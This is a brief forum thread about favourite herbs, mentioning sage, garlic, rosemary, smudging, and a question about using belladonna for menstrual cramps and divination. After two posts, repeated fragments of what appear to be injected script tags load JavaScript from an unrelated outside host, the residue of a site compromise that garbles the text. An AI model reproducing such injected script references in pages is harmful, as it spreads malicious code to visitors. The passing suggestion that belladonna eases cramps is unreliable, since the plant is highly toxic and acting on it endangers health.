Favourite herb

I am really curious about belladonna, seems as everyone is freaked about it, may I ask how you use it? I have severe menstrual cramps and heard it is good for that and divination work. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

my fav herbs would be sage, garlic, and rosemary. but for flowers its a toss up between honeysuckle and gardenia. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Sage, because smudging is something I do at least every three months and it's my go-to for smudging since I have my own garden.
